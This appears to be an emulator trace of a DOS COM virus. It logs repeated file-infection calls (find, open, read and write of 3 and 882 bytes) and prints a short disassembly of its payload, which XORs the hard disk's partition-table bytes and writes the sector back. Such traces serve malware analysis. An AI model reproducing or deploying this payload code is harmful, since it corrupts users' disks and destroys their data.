2018-12-25T11:47:47.875757989Z 2 PC: 12aec | Character output (Char = '00')
2018-12-25T11:47:47.878855897Z 37 PC: 12b20 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:47.880159095Z 48 PC: 12b24 | Get DOS version
2018-12-25T11:47:47.881534003Z 26 PC: 12ccc | Set disk transfer address
2018-12-25T11:47:47.88328627Z 78 PC: 12cd3 | Find first file
2018-12-25T11:47:47.890149277Z 61 PC: 12d12 | Open file (Filename = '')
2018-12-25T11:47:47.897461774Z 63 PC: 12d2d | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:47:47.905438973Z 66 PC: 12d51 | Move file pointer
2018-12-25T11:47:47.908429295Z 66 PC: 12d75 | Move file pointer
2018-12-25T11:47:47.911140602Z 64 PC: 12d87 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:47:47.923516303Z 66 PC: 12d96 | Move file pointer
2018-12-25T11:47:47.925407794Z 64 PC: 12da8 | Write file or device (Write 882 bytes on handle 5)
2018-12-25T11:47:47.941725369Z 62 PC: 12db5 | Close file
2018-12-25T11:47:47.952766426Z 79 PC: 12ce5 | Find next file
2018-12-25T11:47:47.956732744Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:47.964464251Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:47.972256116Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:47.974848899Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:47.976841505Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:47.980070941Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:47.982959609Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:47.992478023Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:48.001950075Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:48.006338577Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:48.014043176Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:48.021929069Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:48.024739471Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:48.032045805Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:48.035179265Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:48.03779485Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:48.048092746Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:48.057388244Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:48.061169595Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:48.068498619Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:48.07597473Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:48.078101662Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:48.088219135Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:48.092428434Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:48.094691404Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:48.105789397Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:48.115686603Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:48.119255851Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:48.128610596Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:48.136657818Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:48.13878354Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:48.141763548Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:48.145391409Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:48.147782844Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:48.15822867Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:48.168743051Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:48.171850853Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:48.179539972Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:48.187351694Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:48.189176318Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:48.191041863Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:48.19512744Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:48.197104984Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:48.207234459Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:48.222435305Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:48.240913686Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:48.248868963Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:48.257538325Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:48.260067807Z 66 PC: 12d75 | Move file pointer (See above)
2018-12-25T11:47:48.262176537Z 64 PC: 12d87 | Write file or device (See above)
2018-12-25T11:47:48.266827166Z 66 PC: 12d96 | Move file pointer (See above)
2018-12-25T11:47:48.269609941Z 64 PC: 12da8 | Write file or device (See above)
2018-12-25T11:47:48.279070596Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:48.288003931Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:48.292203059Z 61 PC: 12d12 | Open file (See above)
2018-12-25T11:47:48.300418145Z 63 PC: 12d2d | Read file or device (See above)
2018-12-25T11:47:48.303626131Z 66 PC: 12d51 | Move file pointer (See above)
2018-12-25T11:47:48.306038224Z 62 PC: 12db5 | Close file (See above)
2018-12-25T11:47:48.308419484Z 79 PC: 12ce5 | Find next file (See above)
2018-12-25T11:47:48.311893663Z 26 PC: 12cf0 | Set disk transfer address
2018-12-25T11:47:48.314314109Z 26 PC: 12ccc | Set disk transfer address (See above)
2018-12-25T11:47:48.316128747Z 78 PC: 12cd3 | Find first file (See above)
2018-12-25T11:47:48.323206466Z 26 PC: 12cf0 | Set disk transfer address (See above)
2018-12-25T11:47:48.325578439Z 44 PC: 12b82 | Get time
0x12b82: cmp cl, 0x11
0x12b85: jne 0x12bc0
0x12b87: mov bx, bp
0x12b89: add bx, 0x3ad
0x12b8d: mov dx, 0x80
0x12b90: mov cx, 1
0x12b93: mov ax, 0x201
0x12b96: int 0x13
0x12b98: xor si, si
0x12b9a: xor byte ptr [bx + si + 0x1c2], 0x55
0x12b9f: add si, 0x10
0x12ba2: cmp si, 0x40
0x12ba5: jle 0x12b9a
0x12ba7: mov dx, 0x80
0x12baa: mov cx, 1
0x12bad: mov ax, 0x301
0x12bb0: int 0x13
0x12bb2: mov ax, 0x1102
0x12bb5: mov bl, al
0x12bb7: int 0x10
2018-12-25T11:47:48.664937124Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')